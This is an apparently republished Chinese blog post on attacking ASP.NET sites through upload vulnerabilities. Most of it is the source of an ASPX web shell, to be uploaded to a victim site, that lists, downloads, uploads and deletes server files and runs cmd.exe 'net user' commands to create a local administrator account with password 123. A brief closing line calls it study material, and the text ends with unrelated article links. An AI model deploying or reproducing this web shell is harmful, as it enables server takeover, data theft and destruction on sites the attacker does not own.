利用上载漏洞，攻击asp.net 网站-白红宇

利用上载漏洞，攻击asp.net 网站

阅读量：5288 次

发布时间：2019-06-14

本文共 3310 字，大约阅读时间需要 11 分钟。

偶然发现有些网站存在上载漏洞，于是乎我利用闲暇时间写了一个小工具。

这个工具主要可以用来列出网站所有文件，上传下载、删除网站文件等功能。

将以下代码保存为文件 lkfile.aspx （可以命名为任意.aspx 文件），

利用上载漏洞上载到网站后，得到类似路径

当然测试时也可以自己创建一个解决方案，把本文件放入到解决方案中

当访问

列出网站目录内容如图，点击可以进入目录或者下载

访问此链接

选择文件点击Upload 上载文件到第一个文本框指定的目录，会先删除原有文件

点击 Delete 删除文本框1 中指定的文件

点击User 会尝试创建文本框1 中命名的用户密码为 123

<%@ Page Language="C#" %>

<%@ Import Namespace="System.IO" %>

private void Page_Load(object sender, EventArgs e)

try

if (!IsPostBack)

string upFileFlag = Request["up"];

if (string.IsNullOrEmpty(upFileFlag) || upFileFlag.ToLower() != "on")

//列出、下载 文件

Response.CacheControl = "no-cache";

Response.Clear();

string url = Request["lk"];

if (String.IsNullOrEmpty(url))

Response.Redirect("/");

string path = Server.MapPath(url);

FileAttributes fas = File.GetAttributes(path);

if ((fas & FileAttributes.Directory) == FileAttributes.Directory)

string webRoot = Server.MapPath("/");

Response.Write(string.Format("
    
     ..{0}
    
", path));

string[] array0 = Directory.GetDirectories(path);

foreach (string name in array0)

string vpath = name.Substring(webRoot.Length);

Response.Write(string.Format("
    
     {1}
    
", vpath, vpath));

string[] array1 = Directory.GetFiles(path);

foreach (string name in array1)

string vpath = name.Substring(webRoot.Length);

Response.Write(string.Format("
    
     {1}
    
", vpath, vpath));

Response.End();

else

FileInfo fi = new FileInfo(path);

Response.ContentType = "application/octet-stream";

Response.AddHeader("Content-Disposition", "attachment;  filename=" + HttpUtility.UrlEncode(fi.Name, System.Text.Encoding.UTF8));

Response.WriteFile(path);

Response.Flush();

Response.End();

else

//显示 文件上传窗口

else

//上传文件

catch (Exception ex)

using (StreamWriter w = File.AppendText(Server.MapPath("/") + "log.txt"))

w.Write(ex.StackTrace);

w.Write(ex.Message);

protected void Button1_Click(object sender, EventArgs e)

try

if (FileUpload1.HasFile)

string vpath = TextBox1.Text;

string realpath = Server.MapPath(vpath);

string fullpath = realpath + FileUpload1.FileName;

if (File.Exists(fullpath))

File.Delete(fullpath);

FileUpload1.SaveAs(fullpath);

catch (Exception ex)

using (StreamWriter w = File.AppendText(Server.MapPath("/") + "log.txt"))

w.Write(ex.StackTrace);

w.Write(ex.Message);

protected void Button2_Click(object sender, EventArgs e)

try

string vpath = TextBox1.Text;

string realpath = Server.MapPath(vpath);

if (File.Exists(realpath))

File.Delete(realpath);

catch (Exception ex)

using (StreamWriter w = File.AppendText(Server.MapPath("/") + "log.txt"))

w.Write(ex.StackTrace);

w.Write(ex.Message);

protected void Button3_Click(object sender, EventArgs e)

try

string username = TextBox1.Text;

if (string.IsNullOrEmpty(username)) username = "crack";

System.Diagnostics.Process.Start("cmd.exe", string.Format("/c net user /add {0} 123", username));

System.Diagnostics.Process.Start("cmd.exe", string.Format("/c net localgroup administrators {0} /add",username));

catch (Exception ex)

using (StreamWriter w = File.AppendText(Server.MapPath("/") + "log.txt"))

w.Write(ex.StackTrace);

w.Write(ex.Message);

test

Store Path :

本文章仅用于学习用途，希望各位程序员朋友在今后的编码过程中尽量避免此类BUG 。

转载于:https://www.cnblogs.com/kevinlc/p/3273522.html

你可能感兴趣的文章

Springboot整合pagehelper分页

查看>>

迅为7寸安卓系统触控一体机提供操作例程【目录】

JavaScript-jQuery报TypeError $(...) is null错误(jQuery失效)解决办法

SAP销售模块塑工常见问题和解决方案(自己收藏)

2018-2019-2 20165314『网络对抗技术』Exp5：MSF基础应用

查看>>

Varish 缓存

查看>>

Jbpm5.4实例在JBoss中运行、及H2数据库迁移oracle数据库

查看>>

各个平台的mysql重启命令

查看>>